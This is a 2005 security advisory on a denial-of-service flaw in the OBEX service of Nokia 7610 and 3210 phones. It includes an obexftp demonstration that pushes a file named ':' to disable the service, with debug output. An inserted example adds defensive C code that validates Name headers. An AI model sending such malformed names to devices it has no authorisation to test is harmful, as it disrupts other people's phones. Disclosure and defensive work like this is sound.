
nokiaDoS.txt
Posted Sep 27, 2005
Authored by Alejandro Ramos | Site unsec.net

Nokia models 7610 and 3210 suffer from a denial of service flaw in the OBEX implementation.

tags | advisory, denial of service
SHA-256 | b0c97ab211f95b643a9aa6908eb8776121e799c92c0cdadae2646cd6c154ba66

Title: Nokia 7610, 3210 Denial of Service in OBEX.
Severity: Low
Affected: tested on Nokia 7610 and Nokia 3210 (possibly other Symbian
phones).
Problem type: remote

Details:
----------------------------------------------------------------------------------------------------------

There is a flaw in the OBEX implementation of the Nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disables the service if you send a
file named ":" or "\".

----
Quote from IROBEX12.pdf, page 40, section 4.3 (OBEX specification):

"Pushing objects into the inbox Objects are pushed into the inbox by using
the PUT command with a Name header. The string in the Name header
should not contain any path characters such as ‘:’, ‘/’ or ‘\’. Objects with
improperly formed names should be rejected."
----
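
The rule in the quoted section, as an added example (not code from the advisory or from Nokia): a C check an OBEX inbox could run on the Name header of a PUT, answering Bad Request for the names the specification says to reject. The function names are hypothetical; the Name header ID (0x01), its length-prefixed UTF-16BE encoding and the response codes follow the OBEX specification.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OBEX_HI_NAME     0x01 /* Name header: UTF-16BE text, null-terminated */
#define OBEX_RSP_SUCCESS 0xA0 /* Success, final bit set */
#define OBEX_RSP_BAD_REQ 0xC0 /* Bad Request, final bit set */

/* Validate one Name header: HI byte, 2-byte big-endian length (covers the
 * 3-byte prefix too), then UTF-16BE text. Returns the response code to send.
 * Rejecting empty names and control characters is this example's own choice. */
uint8_t obex_check_name(const uint8_t *hdr, size_t avail)
{
    if (avail < 3 || hdr[0] != OBEX_HI_NAME)
        return OBEX_RSP_BAD_REQ;
    size_t len = ((size_t)hdr[1] << 8) | hdr[2];
    if (len < 7 || len > avail || ((len - 3) & 1))
        return OBEX_RSP_BAD_REQ;          /* empty, truncated or odd-sized */
    const uint8_t *txt = hdr + 3;
    size_t units = (len - 3) / 2;         /* 16-bit units incl. terminator */
    if (txt[2 * units - 2] != 0 || txt[2 * units - 1] != 0)
        return OBEX_RSP_BAD_REQ;          /* missing terminator */
    for (size_t i = 0; i + 1 < units; i++) {
        uint16_t c = (uint16_t)((txt[2 * i] << 8) | txt[2 * i + 1]);
        if (c < 0x20 || c == ':' || c == '/' || c == '\\')
            return OBEX_RSP_BAD_REQ;      /* path or control character */
    }
    return OBEX_RSP_SUCCESS;
}

/* Constructed test input: encode an ASCII name as a Name header, then check. */
uint8_t obex_check_ascii_name(const char *name)
{
    uint8_t hdr[3 + 2 * 64];
    size_t n = strlen(name);
    if (n > 63)
        return OBEX_RSP_BAD_REQ;
    size_t len = 3 + 2 * (n + 1);
    memset(hdr, 0, sizeof hdr);           /* high bytes and terminator = 0 */
    hdr[0] = OBEX_HI_NAME;
    hdr[1] = (uint8_t)(len >> 8);
    hdr[2] = (uint8_t)(len & 0xFF);
    for (size_t i = 0; i < n; i++)
        hdr[3 + 2 * i + 1] = (uint8_t)name[i];
    return obex_check_name(hdr, len);
}
```

The check returns a response code for every input, including truncated headers, so the caller can answer the request and keep the service listening for the next one.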

The device asks for a PIN if you are not paired, or asks whether you
want to accept a connection from the remote box; you need to ACCEPT.
The risk is low, because it does not work if you do not accept the
incoming connection.

If the connection is established, the file is sent and there is no "New
message arrived" message, as there is when you send a correctly named
file. That is fine: the filename is dropped.

The problem is that the OBEX service does not work any more after this:
if you try to send another file, or a vCard from another device, you
cannot connect to the remote OBEX service again.

Demonstration with Linux as client:


jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610


jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing another file after sending the ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
----------------------------------------------------------------------------------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


--
A. Ramos.
mailto: <aramosf@unsec.net>
http://www.unsec.net